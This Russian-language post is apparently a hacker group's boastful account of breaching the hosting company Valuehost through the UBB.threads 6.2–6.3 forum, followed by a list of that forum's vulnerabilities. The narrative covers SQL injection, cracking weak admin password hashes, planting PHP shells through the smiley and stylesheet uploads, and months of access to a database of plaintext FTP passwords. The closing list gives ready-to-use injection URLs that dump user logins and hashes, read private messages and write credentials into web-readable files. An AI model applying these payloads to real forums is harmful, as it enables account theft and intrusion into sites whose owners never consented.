Уже как несколько месяцев весь рунет
стоит на ушах из-за того, что один из самый
известных русских хостеров (valuehost) был
взломан. Сейчас я вам расскажу как всё было...
Всё произошло примерно пол года назад. Как-то
в один прекрасный день мы узнали, что один
из мемберов нашей тимы (w00t) нашёл уязвимость
в форуме UBB.threads 6.2.*-6.3.*. Это была обычная
инъекция, которой за считанные секунды
можно было получить хеши всех
администраторов и пользователей форума.
Вот и сама уязвимость, которая принесла
большие траблы админам валуе =) (Все
респекты Вут'у =)): (багу мы выкладывали на
паре известных форумов, но это была самая
грубая ошибка, некоторые личности ей и
увели базу, что привело к масс дефейсу
известных русских сайтов и раздаче базы "кому
попало").
http://urlubb.com/showmembers.php?Cat=&like=
1'%20union%20SELECT%20U_LoginName,U_Registered,
U_Extra1,U_Password,U_TotalPosts,U_Extra1,U_ Number%20FROM%20w3t_Users%20WHERE%
20U_Status='Administrator'/*
После того, как мы увидели хеши админов
форума в кодировке MD5, в дело пошёл обычный
брутфорсер - MD5 Inside. Оказалось, что админы
зачем-то зарегали 5 админов, причём
появлялись на форуме максимум 1-2. Ещё они не
дружат со сложными пассами 🙂 За час мы
расшифровали парочку админских пассов (помнится
мне, что у одного был пароль 1234567890 %). По
началу казалось, что это ничего не даст, так
как админы таких крупных хостеров не
ламоразмы и прав на запись не оставляют, но
эти оказались особыми 🙂 Права на запись
смайлов были не прикрыты /images/icons/. В
результате в админке форума был залит php
шелл через смайлик. Как вы понимаете,
валуехост оставалось недолго жить на свете...
=)
Пару ночей мы рылись в исходниках и
изучали прелести валуехоста 🙂 В конфиге
достали пароль от главной базы. Далее
залили на валуе скрипт для просмотра БД и
спокойно вошли в неё. Там нас ожидало очень
много интересного. FTP пассы в открытом
виде, инфа владельцев доменов и разная
прочая фигня лежала в огромной базе с 60.000
сайтами.
Прошло полгода, доступ к базе был у нас до
сих пор! Некоторые личности приобретшие
базу начали раздавать её и появлялось
множество якобы "дефейсов" кульных
сайтов. Поступало много звонков к админам,
что вот их отымели, но сперва они думали, что
это полный бред и отвечали по телефону: "Взлом
нашего сервера невозможен, это исключено".
Как-то раз после учёбы вечерком сожусь за
комп и от одного из мемберов узнаю, что
админы вышли из долгой спячки (которая
длилась пол года) и поприкрывали всё нахрен.
Лично я был немного рад, что наконец-то
прекратятся эти бесконечные "дефейсы",
но всё равно в душе было немного жалко
потерять доступ к такой огромной БД ;). И тут
мы разгорелись желанием всё-таки вернуть
эту базу, не для дефейсов, не для продажи, а
для интереса. Valuehost были как всегда на
высоте в своей тупизне ). Инъекцию на форуме
они не прикрыли, а просто снесли все наши
"потайные ходы (шеллы, нужные инструменты
=))и убрали права на запись в /icons/...
После двух часов расшифровки очередных
админских хешей форума мы нашли ещё одного
"любителя маленьких паролей".
Очередной раз мы в админке, через смайл шелл
залить нельзя, пишет права нету у тебя, тут в
админке UBB я нашёл ещё одну мазу - добавлять
стили или редактировать их. Админы прикрыли
права на /icons/, а /stylesheets/ прикрыть они не
догадались (просто добавлять или
редактировать стили форума и делать шелл).
После 15 минут смеха мы опять каким-то
макаром лазали по базе как по своей :)...
Но не всё так радостно. Через несколько дней
все наши шеллы поприкрывали и самое главное
- их форум UBB был снесён окончательно. ИМХО
главный директор ВалуеХост открыл глаза и
выгнал этих недоумков с работы, нанял умных
людей. Пусть это служит уроком для
администраторов серваков, которые любят
поставить на свой ресурс что-то публичное
вместо того, что бы посидеть и написать свой
двиг, чьи сорцы будут никому неизвестны :).
Ну а насчёт паролей тут уже говорить нечего,
ставить на такой умопомрачительный хостер
5-значный пасс просто ЛОЛ...
Ну а вот все уязвимости UBB.threads 6.2.*-6.3.*
найденными нами (Cyber Lords Team):
1. Выводим логины и хеши паролей всех юзеров...
http://forum.ru/showmembers.php?Cat=&like=
1'%20union%20select%20U_LoginName,0,0, U_Password,0,0,0%20from%20w3t_Users/*
http://forum.ru/showmembers.php?Cat=&like=
1'%20union%20select%20U_LoginName,0,0, U_Password,0,0,0%20from%20w3t_Users where
U_Status='Administrator'/*
Выводим пассы всех админов... Заменяем
Administrator на Moderator и получаем тоже тока для
модеров....
2. Читаем чужие приваты...
http://forum.ru/viewmessage.php?Cat=&message=
1%20or%201=1%20and%20t1.M_Number= ТУТ ПИШЕМ НОМЕР ПРИВАТА
КОТОРЫЙ ХОТИМ ПОЧИТАТЬ/*
Например:
http://forum.ru/viewmessage.php?Cat=&message=
1%20or%201=1%20and%20t1.M_Number=3/*
3. Пишем все логины с паролями в файл на
серваке:
http://forum.ru/viewmessage.php?Cat=&message=
999999999%20union%20select%20U_LoginName, 0,0,0,0,U_Password%20from%20w3t_Users%
20where%201=1%20into%20outfile%20'/ПУТЬ ДО ФОРУМА/images/icons/info.txt'/*
Путь можно узнать так: http://31337.org/showmembers.php?Cat=&like=0'
- вылезет ошибка и там видно путь...
4. Получаем список логинов всех юзеров..
http://forum.ru/showflat.php?Cat=&Number
=999999%20union%20select%200,U_Login Name%20from%20w3t_Users%20where%2
01=1%20into%20outfile%20' /var/www/html/forum/images/icons/info1.txt'
Меняем U_LoginName на U_Password, info1.txt на info2.txt и в
файле info2.txt получаем пасы всех юзеров...
Примерно так:
http://forum.ru/images/icons/info2.txt
P.S. Иногда надо регаться чтобы бага
прокатила, а иногда не надо... Всё зависит от
настроек форума..
We are: Condor, k0pa, w00t, _SPiRiT_, Xterm, DiorR..
http://www.cyberlords.net
irc.phey.net
